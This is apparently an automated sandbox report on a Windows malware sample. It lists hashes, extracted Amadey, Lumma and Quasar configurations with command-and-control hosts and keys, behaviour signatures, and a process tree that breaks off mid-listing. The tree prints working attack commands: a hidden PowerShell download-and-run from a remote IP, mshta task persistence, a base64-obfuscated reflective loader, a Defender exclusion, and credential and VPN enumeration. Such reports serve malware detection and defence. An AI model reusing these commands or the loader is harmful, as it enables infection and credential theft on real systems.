Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 02:09

General

  • Target

    2025-04-02_332674200e3c2718e6f5630acf2f6843_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    332674200e3c2718e6f5630acf2f6843

  • SHA1

    cc0283d0db41be8b340182dc192ab6f95a9d1dfe

  • SHA256

    195cb2036a0e686a76845ecceaa59c41b159fca7acf4655d70bb41fbaf2e009e

  • SHA512

    4fc9e7307b946aa19937a3c16bb89c3e36425b5fe5b9b65bbea29f71a49188ad5b584a0461fa2b7423a0db4f8dab00f2dc388650b030decdd0a071db70f3206c

  • SSDEEP

    24576:HqDEvCTbMWu7rQYlBQcBiT6rprG8a00u:HTvC/MTQYxsWR7a00

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://hadvennture.top/GKsiio

https://anavstarx.shop/FoaJSi

https://6jmetalsyo.digital/opsa

https://qspacedbv.world/EKdlsk

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 18 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads ssh keys stored on the system 2 TTPs

    Tries to access SSH used by SSH programs.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 24 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 64 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 6 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-02_332674200e3c2718e6f5630acf2f6843_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-02_332674200e3c2718e6f5630acf2f6843_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3156
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn CljEymaYUo7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\00mhoVEOG.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2976
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn CljEymaYUo7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\00mhoVEOG.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1184
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\00mhoVEOG.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4680
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LTVJ6RNAZJJK9IDN9EGQLENDRCAKQ4V4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1460
        • C:\Users\Admin\AppData\Local\TempLTVJ6RNAZJJK9IDN9EGQLENDRCAKQ4V4.EXE
          "C:\Users\Admin\AppData\Local\TempLTVJ6RNAZJJK9IDN9EGQLENDRCAKQ4V4.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4828
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5852
            • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
              "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:6124
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                  PID:2412
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5012
              • C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
                "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:6136
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3192
              • C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe
                "C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4336
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5816
              • C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe
                "C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1916
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2676
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:6024
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:4464
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                    8⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops startup file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2452
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5396
              • C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
                "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
                6⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Suspicious behavior: EnumeratesProcesses
                PID:3564
                • C:\Windows\system32\cmd.exe
                  "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_55966926.txt\""
                  7⤵
                  • NTFS ADS
                  PID:2056
                • C:\Windows\system32\net.exe
                  "net" statistics workstation
                  7⤵
                    PID:3136
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 statistics workstation
                      8⤵
                        PID:5792
                    • C:\Windows\system32\vaultcmd.exe
                      "vaultcmd" /list
                      7⤵
                        PID:1208
                      • C:\Windows\system32\tasklist.exe
                        "tasklist"
                        7⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1900
                      • C:\Windows\system32\tasklist.exe
                        "tasklist"
                        7⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5680
                      • C:\Windows\system32\tasklist.exe
                        "tasklist"
                        7⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2460
                      • C:\Windows\system32\tasklist.exe
                        "tasklist" /FO CSV /NH
                        7⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:776
                      • C:\Windows\system32\tasklist.exe
                        "tasklist"
                        7⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2312
                      • C:\Windows\system32\cmdkey.exe
                        "cmdkey" /list
                        7⤵
                          PID:1968
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6076
                          • C:\Windows\system32\cmdkey.exe
                            "C:\Windows\system32\cmdkey.exe" /list
                            8⤵
                              PID:5840
                          • C:\Windows\system32\tasklist.exe
                            "tasklist"
                            7⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5208
                          • C:\Windows\system32\tasklist.exe
                            "tasklist"
                            7⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:6068
                          • C:\Windows\system32\tasklist.exe
                            "tasklist"
                            7⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4408
                          • C:\Windows\system32\tasklist.exe
                            "tasklist"
                            7⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1476
                          • C:\Windows\system32\certutil.exe
                            "certutil" -store My
                            7⤵
                              PID:1576
                            • C:\Windows\system32\tasklist.exe
                              "tasklist"
                              7⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4584
                            • C:\Windows\system32\certutil.exe
                              "certutil" -store -user My
                              7⤵
                                PID:396
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5784
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  8⤵
                                    PID:1796
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  7⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3284
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  7⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4796
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  7⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3064
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  7⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4472
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
